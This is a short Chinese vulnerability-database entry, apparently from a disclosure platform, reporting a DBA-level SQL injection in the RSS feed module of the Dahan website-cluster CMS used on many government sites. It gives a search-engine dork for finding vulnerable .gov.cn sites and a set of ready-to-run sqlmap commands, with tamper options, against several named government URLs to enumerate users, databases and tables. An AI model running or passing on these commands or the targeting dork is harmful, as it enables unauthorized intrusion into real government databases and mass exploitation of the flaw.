大汉网络网站群一处dba式sqL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 你猜 ### 详细说明: site:gov.cn module/rss 找到约 1,360,000 条结果 (用时 0.25 秒) 大汉网络网站集群的一个订阅功能dba注射,可衍射出其多款产品数据库 找了谷歌前几页的gov网站,命中率还不错 ### 漏洞证明: ``` site:gov.cn module/rss sqlmap.py -u "http://www.yuanan.gov.cn/module/rss/rssfeed.jsp?colid=23" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between sqlmap.py -u "http://www.jblr.gov.cn/module/rss/rssfeed.jsp?colid=13247" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between sqlmap.py -u "http://www.sxyc.gov.cn/module/rss/rssfeed.jsp?colid=70" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between sqlmap.py -u "http://jb.ningbo.gov.cn/module/rss/rssfeed.jsp?colid=6094" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between --tables -D "JCMS" ``` [<img src="https://images.seebug.org/upload/201405/231512212b72d92ecdc6ca0643728816e820605d.png" alt="1.png" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息